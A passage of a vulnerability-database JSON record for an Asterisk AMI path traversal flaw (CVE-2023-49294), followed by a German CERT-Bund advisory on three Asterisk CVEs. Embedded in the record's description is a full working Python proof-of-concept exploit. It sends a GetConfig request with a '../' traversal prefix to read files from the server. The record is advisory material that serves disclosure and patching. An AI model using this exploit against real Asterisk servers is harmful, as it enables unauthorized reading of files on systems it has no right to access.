                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "18.20.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "20.5.1",
                "versionStartIncluding": "19.0.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Debian",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "176383"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2023-49294",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security-advisories@github.com",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2023-49294",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2023-49294",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "security-advisories@github.com",
            "id": "CVE-2023-49294",
            "trust": 1.0,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1                   security@debian.org\nhttps://www.debian.org/security/                          Markus Koschany\nJanuary 04, 2024                      https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : asterisk\nCVE ID         : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug     : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n    The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n    the available buffer space for storing the new value of a header. By doing\n    so this can overwrite memory or cause a crash. This is not externally\n    exploitable, unless dialplan is explicitly written to update a header based\n    on data from an outside source. If the \u0027update\u0027 functionality is not used\n    the vulnerability does not occur. \n\nCVE-2023-38703\n\n    PJSIP is a free and open source multimedia communication library written in\n    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n    higher level media transport which is stacked upon a lower level media\n    transport such as UDP and ICE. Currently a higher level transport is not\n    synchronized with its lower level transport that may introduce a\n    use-after-free issue. This vulnerability affects applications that have\n    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n    transport other than UDP. This vulnerability\u2019s impact may range from\n    unexpected application termination to control flow hijack/memory\n    corruption. \n\nCVE-2023-49786\n\n   Asterisk is susceptible to a DoS due to a race condition in the hello\n   handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n   setup. This attack can be done continuously, thus denying new DTLS-SRTP\n   encrypted calls during the attack. Abuse of this vulnerability may lead to\n   a massive Denial of Service on vulnerable Asterisk servers for calls that\n   rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n. # Exploit Title: Asterisk AMI - Partial File Content \u0026 Path Disclosure (Authenticated)\n# Date: 2023-03-26\n# Exploit Author: Sean Pesce\n# Vendor Homepage: https://asterisk.org/\n# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/\n# Version: 18.20.0\n# Tested on: Debian Linux\n# CVE: CVE-2023-49294\n\n#!/usr/bin/env python3\n#\n# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that\n# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of\n# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar\n# to the common INI configuration format. \n#\n# References:\n#   https://nvd.nist.gov/vuln/detail/CVE-2023-49294\n#   https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\n#   https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/\n\n\nimport argparse\nimport getpass\nimport socket\nimport sys\n\n\nCVE_ID = \u0027CVE-2023-49294\u0027\n\nDEFAULT_PORT = 5038\nDEFAULT_FILE = \u0027/etc/hosts\u0027\nDEFAULT_ACTION_ID = 0\nDEFAULT_TCP_READ_SZ = 1048576  # 1MB\n\n\n\ndef ami_msg(action, args, encoding=\u0027utf8\u0027):\n    assert type(action) == str, f\u0027Invalid type for AMI Action (expected string): {type(action)}\u0027\n    assert type(args) == dict, f\u0027Invalid type for AMI arguments (expected dict): {type(args)}\u0027\n    if \u0027ActionID\u0027 not in args:\n        args[\u0027ActionID\u0027] = 0\n    line_sep = \u0027\\r\\n\u0027\n    data = f\u0027Action: {action}{line_sep}\u0027\n    for a in args:\n        data += f\u0027{a}: {args[a]}{line_sep}\u0027\n    data += line_sep\n    return data.encode(encoding)\n\n\n\ndef tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):\n    assert type(data) in (bytes, bytearray, memoryview), f\u0027Invalid data type (expected bytes): {type(data)}\u0027\n    sock.sendall(data)\n    resp = b\u0027\u0027\n    while not resp.endswith(b\u0027\\r\\n\\r\\n\u0027):\n        resp += sock.recv(read_sz)\n    return resp\n\n\n\nif __name__ == \u0027__main__\u0027:\n    # Parse command-line arguments\n    argparser = argparse.ArgumentParser()\n    argparser.add_argument(\u0027host\u0027, type=str, help=\u0027The host name or IP address of the Asterisk AMI server\u0027)\n    argparser.add_argument(\u0027-p\u0027, \u0027--port\u0027, type=int, help=f\u0027Asterisk AMI TCP port (default: {DEFAULT_PORT})\u0027, default=DEFAULT_PORT)\n    argparser.add_argument(\u0027-u\u0027, \u0027--user\u0027, type=str, help=f\u0027Asterisk AMI user\u0027, required=True)\n    argparser.add_argument(\u0027-P\u0027, \u0027--password\u0027, type=str, help=f\u0027Asterisk AMI secret\u0027, default=None)\n    argparser.add_argument(\u0027-f\u0027, \u0027--file\u0027, type=str, help=f\u0027File to read (default: {DEFAULT_FILE})\u0027, default=DEFAULT_FILE)\n    argparser.add_argument(\u0027-a\u0027, \u0027--action-id\u0027, type=int, help=f\u0027Action ID (default: {DEFAULT_ACTION_ID})\u0027, default=DEFAULT_ACTION_ID)\n    if \u0027-h\u0027 in sys.argv or \u0027--help\u0027 in sys.argv:\n        print(f\u0027Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \\nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\\n\u0027, file=sys.stderr)\n        argparser.print_help()\n        sys.exit(0)\n    args = argparser.parse_args()\n\n    # Validate command-line arguments\n    assert 1 \u003c= args.port \u003c= 65535, f\u0027Invalid port number: {args.port}\u0027\n    args.host = socket.gethostbyname(args.host)\n    if args.password is None:\n        args.password = getpass.getpass(f\u0027[PROMPT] Enter the AMI password for {args.user}: \u0027)\n\n    print(f\u0027[INFO] Proof of concept exploit for {CVE_ID}\u0027, file=sys.stderr)\n    print(f\u0027[INFO] Connecting to Asterisk AMI:  {args.user}@{args.host}:{args.port}\u0027, file=sys.stderr)\n\n    # Connect to the Asterisk AMI server\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    sock.connect((args.host, args.port))\n\n    # Read server banner\n    banner = sock.recv(DEFAULT_TCP_READ_SZ)\n    print(f\u0027[INFO] Connected to {banner.decode(\"utf8\").strip()}\u0027, file=sys.stderr)\n\n    # Authenticate to the Asterisk AMI server\n    login_msg = ami_msg(\u0027Login\u0027, {\u0027Username\u0027:args.user,\u0027Secret\u0027:args.password})\n    login_resp = tcp_send_rcv(sock, login_msg)\n    while b\u0027Authentication\u0027 not in login_resp:\n        login_resp = tcp_send_rcv(sock, b\u0027\u0027)\n    if b\u0027Authentication accepted\u0027 not in login_resp:\n        print(f\u0027\\n[ERROR] Invalid credentials: \\n{login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n        sys.exit(1)\n    #print(f\u0027[INFO] Authenticated: {login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n    print(f\u0027[INFO] Login success\u0027, file=sys.stderr)\n\n    # Obtain file data via path traversal\n    traversal = \u0027../../../../../../../../\u0027\n    cfg_msg = ami_msg(\u0027GetConfig\u0027, {\n        \u0027ActionID\u0027: args.action_id,\n        \u0027Filename\u0027: f\u0027{traversal}{args.file}\u0027,\n        #\u0027Category\u0027: \u0027default\u0027,\n        #\u0027Filter\u0027: \u0027name_regex=value_regex,\u0027,\n    })\n    resp = tcp_send_rcv(sock, cfg_msg)\n    while b\u0027Response\u0027 not in resp:\n        resp = tcp_send_rcv(sock, b\u0027\u0027)\n\n    print(f\u0027\u0027, file=sys.stderr)\n    print(f\u0027{resp.decode(\"utf8\")}\u0027)\n\n    if b\u0027Error\u0027 in resp:\n        sys.exit(1)\n\n    pass  # Done\n            \n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2023-49294",
        "trust": 2.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "176383",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "177819",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "id": "VAR-202312-2340",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 1.0
  },
  "last_update_date": "2024-03-30T22:40:30.232000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.0
      },
      {
        "problemtype": "Path traversal (CWE-22) [ others ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-8857-hfmw-vg8f"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#l3757"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/asterisk"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
      },
      {
        "trust": 0.1,
        "url": "https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/{cve_id}\\n\u0027,"
      },
      {
        "trust": 0.1,
        "url": "https://asterisk.org/"
      },
      {
        "trust": 0.1,
        "url": "https://docs.asterisk.org/asterisk_18_documentation/api_documentation/ami_actions/getconfig/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "date": "2024-01-05T14:31:02",
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "date": "2024-03-28T14:16:21",
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "date": "2023-12-14T20:15:52.730000",
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-16T02:49:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "date": "2023-12-29T00:15:49.930000",
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Path traversal vulnerabilities in products from multiple vendors such as",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "info disclosure",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "177819"
      }
    ],
    "trust": 0.1
  }
}

WID-SEC-W-2023-3158

Vulnerability from csaf_certbund - Published: 2023-12-14 23:00 - Updated: 2024-12-08 23:00

Summary

Digium Certified Asterisk: Mehrere Schwachstellen

Severity

Mittel

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung: Certified Asterisk ist eine komplette Multiprotokoll Telefonanlage (PBX) auf Softwarebasis mit erweitertem Support. Asterisk ist eine komplette Open Source Multiprotokoll Telefonanlage (PBX) auf Softwarebasis.

Angriff: Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Digium Certified Asterisk und Asterisk ausnutzen, um einen Denial of Service Angriff durchzuführen oder Informationen offenzulegen.

Betroffene Betriebssysteme: - Linux - Sonstiges - UNIX - Windows

CVE-2023-37457

Es existiert eine Schwachstelle in Digium Certified Asterisk und Asterisk. Die 'Update'-Funktionalität der Dialplan-Funktion PJSIP_HEADER kann den verfügbaren Pufferplatz für die Speicherung des neuen Wertes eines Headers überschreiten. Ein Angreifer kann diese Schwachstelle ausnutzen, um einen Denial of Service zu verursachen.

Affected products

Known affected 6 products

Product	Identifier	Version
Digium Certified Asterisk <18.9-cert6 Digium / Certified Asterisk		<18.9-cert6
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Open Source Asterisk <20.5.1 Open Source / Asterisk		<20.5.1
Open Source Asterisk <18.20.1 Open Source / Asterisk		<18.20.1
Open Source Asterisk <21.0.1 Open Source / Asterisk		<21.0.1
Gentoo Linux Gentoo	`cpe:/o:gentoo:linux:-`	—

CVE-2023-49294

Es existiert eine Schwachstelle in Digium Certified Asterisk und Asterisk. Ein Path Traversal Problem in AMI GetConfig ermöglicht Zugriff auf externe Dateien. Ein privilegierter Angreifer kann diese Schwachstelle ausnutzen, um Informationen offenzulegen.

Affected products

Known affected 6 products

Product	Identifier	Version
Digium Certified Asterisk <18.9-cert6 Digium / Certified Asterisk		<18.9-cert6
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Open Source Asterisk <20.5.1 Open Source / Asterisk		<20.5.1
Open Source Asterisk <18.20.1 Open Source / Asterisk		<18.20.1
Open Source Asterisk <21.0.1 Open Source / Asterisk		<21.0.1
Gentoo Linux Gentoo	`cpe:/o:gentoo:linux:-`	—

CVE-2023-49786

Es existiert eine Schwachstelle in Digium Certified Asterisk und Asterisk. Während des Rufaufbaus kommt es in der Hello-Handshake-Phase des DTLS-Protokolls zu einer Race-Condition. Ein entfernter, anonymer Angreifer kann diese Schwachstelle mit speziell bearbeiteten DTLS Hello-Paketen ausnutzen, um einen Denial of Service zu verursachen.

Affected products

Known affected 6 products

Product	Identifier	Version
Digium Certified Asterisk <18.9-cert6 Digium / Certified Asterisk		<18.9-cert6
Debian Linux Debian	`cpe:/o:debian:debian_linux:-`	—
Open Source Asterisk <20.5.1 Open Source / Asterisk		<20.5.1
Open Source Asterisk <18.20.1 Open Source / Asterisk		<18.20.1
Open Source Asterisk <21.0.1 Open Source / Asterisk		<21.0.1
Gentoo Linux Gentoo	`cpe:/o:gentoo:linux:-`	—

References

10 references

URL	Category
https://wid.cert-bund.de/.well-known/csaf/white/2…	self
https://wid.cert-bund.de/portal/wid/securityadvis…	self
https://bugzilla.redhat.com/show_bug.cgi?id=2254625	external
https://github.com/asterisk/asterisk/security/adv…	external
https://github.com/asterisk/asterisk/security/adv…	external
https://github.com/asterisk/asterisk/security/adv…	external
https://github.com/asterisk/asterisk/security/adv…	external
https://lists.debian.org/debian-lts-announce/2023…	external
https://lists.debian.org/debian-security-announce…	external
https://security.gentoo.org/glsa/202412-03	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "mittel"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "Certified Asterisk ist eine komplette Multiprotokoll Telefonanlage (PBX) auf Softwarebasis mit erweitertem Support.\r\nAsterisk ist eine komplette Open Source Multiprotokoll Telefonanlage (PBX) auf Softwarebasis.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Digium Certified Asterisk und Asterisk ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren oder Informationen offenzulegen.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Linux\n- Sonstiges\n- UNIX\n- Windows",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2023-3158 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-3158.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2023-3158 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-3158"
      },
      {
        "category": "external",
        "summary": "RedHat Bugzilla vom 2023-12-14",
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254625"
      },
      {
        "category": "external",
        "summary": "GitHub Asterisk vom 2023-12-14",
        "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
      },
      {
        "category": "external",
        "summary": "GitHub Asterisk vom 2023-12-14",
        "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
      },
      {
        "category": "external",
        "summary": "GitHub Asterisk vom 2023-12-14",
        "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
      },
      {
        "category": "external",
        "summary": "GitHub Asterisk vom 2023-12-14",
        "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-5743-x3p5-3rg7"
      },
      {
        "category": "external",
        "summary": "Debian Security Advisory DLA-3696 vom 2023-12-29",
        "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
      },
      {
        "category": "external",
        "summary": "Debian Security Advisory DSA-5596 vom 2024-01-04",
        "url": "https://lists.debian.org/debian-security-announce/2024/msg00003.html"
      },
      {
        "category": "external",
        "summary": "Gentoo Linux Security Advisory GLSA-202412-03 vom 2024-12-07",
        "url": "https://security.gentoo.org/glsa/202412-03"
      }
    ],
    "source_lang": "en-US",
